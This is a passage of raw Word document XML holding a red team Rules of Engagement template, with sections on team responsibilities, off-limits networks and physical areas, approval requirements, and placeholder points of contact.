        <w:t>b. All contact with computer networks/subnets will be from within the Red Team or target of engagement environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E89F220" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>c. During the engagement, any deviations from these ROE must be mutually agreed to and approved in writing by the senior representatives for the Red Team, [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>customer</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>, [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>system owner (if different)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ], and [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>any stakeholders required for engagement execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1AB108" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>REQUIREMENTS, RESTRICTIONS, AND AUTHORITY</w:t>
      </w:r>
      <w:hyperlink r:id="rId76" w:anchor="requirements-restrictions-and-authority" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="34065FF7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>a. The Red Team will:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C5B79" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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Provide the appropriate support and input for the planning of the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506E1B81" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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Coordinate engagement approval and support via this Rules of Engagement (ROE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B220918" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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lastRenderedPageBreak/>
        <w:t>Inform target of engagement POCs of all team requirements (logistics, administrative, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C3A067" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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Coordinate team personnel and administrative issues/concerns with [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>insert POC position/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED8296" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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Provide contact information (i.e. names, job titles, phone &amp; email address) to the [ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>customer</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> representatives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB76EF0" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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Escalate problems and issues to the appropriate representatives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6427BABD" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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Upload, where appropriate, indicators on systems to demonstrate a compromised state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6333BE6C" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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When necessary, add/modify/disable accounts (not delete them) on compromised systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531D264D" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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Conduct exploitation with the intent of emulating threat techniques, tactics and procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2053357C" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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May view/read or modify personal data files, PII, or emails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3337A3E6" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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NOT use unapproved tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78977DD3" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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NOT damage systems or networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C30E99" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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NOT conduct denial of service (DOS), except as explicitly approved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6413E2AA" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>GROUND RULES</w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:anchor="ground-rules" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69EB80DA" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>This section identifies specific rules associated with the execution of this event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABB1705" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>a. Network Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466EDCE7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>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 xml:space="preserve">All systems outside the IP ranges provided under separate cover are off </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>limits</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="261D6BB4" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>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All [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">insert </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>here</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> applications that are discovered during network operations will be off limits. This includes the following (list provided)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B98D70" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">insert </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>here</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> are off limits. IP addresses will be provided Appendix [ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5673F29A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>b. Physical Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392EF3E2" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>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All [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">insert </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>here</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> areas are off limits to Red Team personnel including transient movement due to potential loss of life, limb, or eyesight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594EFB31" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>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Buildings [ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> through [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ] are off limits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46077BB0" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>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 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> binders in any office will not be inspected, touched or removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2820F691" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>RESOLUTION OF ISSUES/POINTS OF CONTACT (POC)</w:t>
      </w:r>
      <w:hyperlink r:id="rId78" w:anchor="resolution-of-issuespoints-of-contact-poc" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="139FD42C" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Any issues that may develop, which are not covered by this ROE, will be resolved mutually with all stakeholders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759B5800" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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CIO Representative: Mr. Joe Snuffy, (555) 555-0001, </w:t>
      </w:r>
      <w:hyperlink r:id="rId79" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>joe.snuffy@iheartredteams.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="638BE4CB" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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CIO: Mrs. Jane Doe, (555) 555-0005, </w:t>
      </w:r>
      <w:hyperlink r:id="rId80" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>jane.doe@customer.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08D53610" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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 xml:space="preserve">Red Team Lead: Mr. James </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tubberville</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 123.456-7890. </w:t>
      </w:r>
      <w:hyperlink r:id="rId81" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>james@iheartredteams.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7687B004" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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Red Team Tech Lead: Mr. Joe Vest, 123.456.7890, </w:t>
      </w:r>
